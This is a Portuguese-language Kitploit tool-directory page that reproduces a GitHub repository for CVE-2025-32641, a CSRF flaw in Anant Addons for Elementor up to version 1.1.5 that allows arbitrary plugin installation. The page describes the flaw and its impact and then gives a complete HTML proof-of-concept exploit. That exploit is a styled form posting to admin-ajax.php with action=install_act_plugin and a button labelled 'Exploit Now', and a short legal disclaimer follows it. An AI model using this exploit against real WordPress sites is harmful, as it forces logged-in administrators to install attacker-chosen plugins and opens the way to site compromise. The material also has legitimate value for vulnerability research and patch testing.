Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/nxploited/cve-2025-32641
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebPapers e PesquisaAprendizado e Educação
GitHubnxploited/cve-2025-32641

CVE-2025-32641

Anant Addons for Elementor <= 1.1.5 vulnerabilidade de CSRF para instalação arbitrária de plugins

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ Anant Addons for Elementor <= 1.1.5 - CSRF para Instalação Arbitrária de Plugins

🧨 CVE-2025-32641

Vulnerabilidade Cross-Site Request Forgery (CSRF) em anantaddons – Anant Addons for Elementor
Este problema afeta as versões: de versão desconhecida até 1.1.5

  • Pontuação Base: 9.6 (CRÍTICO)
  • Vetor CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔍 Descrição

Essa vulnerabilidade permite que atacantes não autenticados realizem instalação arbitrária de plugins em nome de um administrador conectado, sem que ele saiba.
Ao criar uma página ou formulário malicioso, o atacante pode forçar silenciosamente o administrador a instalar e ativar qualquer plugin do repositório do WordPress.


💥 Impacto

  • ✅ Instalação arbitrária de plugins
  • ✅ Ativação de plugins
  • ❌ Sem proteção nonce ou CSRF
  • ✅ Explorável por meio de uma página HTML simples
  • ⚠️ Exige que o administrador esteja conectado e abra a página maliciosa

🧪 Prova de Conceito em HTML

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
  <style>
    body {
      background-color: #111;
      color: #0f0;
      font-family: monospace;
      padding: 40px;
    }
    h1 {
      color: #ff0055;
      font-size: 24px;
      border-bottom: 1px solid #555;
      padding-bottom: 10px;
    }
    .box {
      background-color: #222;
      border: 1px solid #444;
      padding: 20px;
      margin-top: 20px;
    }
    input[type="submit"] {
      background-color: #ff0055;
      color: #fff;
      border: none;
      padding: 10px 20px;
      font-weight: bold;
      cursor: pointer;
    }
    input[type="submit"]:hover {
      background-color: #cc0044;
    }
  </style>
</head>
<body>

  <h1>
    Anant Addons for Elementor <= 1.1.5<br>
    CSRF to Arbitrary Plugin Installation Vulnerability
  </h1>

  <div class="box">
    <p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
    <p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
    <p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
  </div>

  <form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
    <input type="hidden" name="plugs" value="hello-dolly">
    <p>🎯 Click the button below to trigger plugin installation (admin session must be active):</p>
    <input type="submit" value="Exploit Now">
  </form>

</body>
</html>


🎯 Quando um administrador conectado clica neste formulário (ou ele é enviado automaticamente em uma página maliciosa), o plugin será silenciosamente instalado e ativado.


⚠️ Aviso Legal

Este repositório e conteúdo são apenas para fins de educação e pesquisa em segurança.
O autor não é responsável por qualquer uso indevido ou dano causado pelo uso inadequado destas informações.
Sempre realize testes em sistemas que você possua ou tenha permissão explícita para testar.


por: Nxploited | Khaled ALenazi

Baixar ferramenta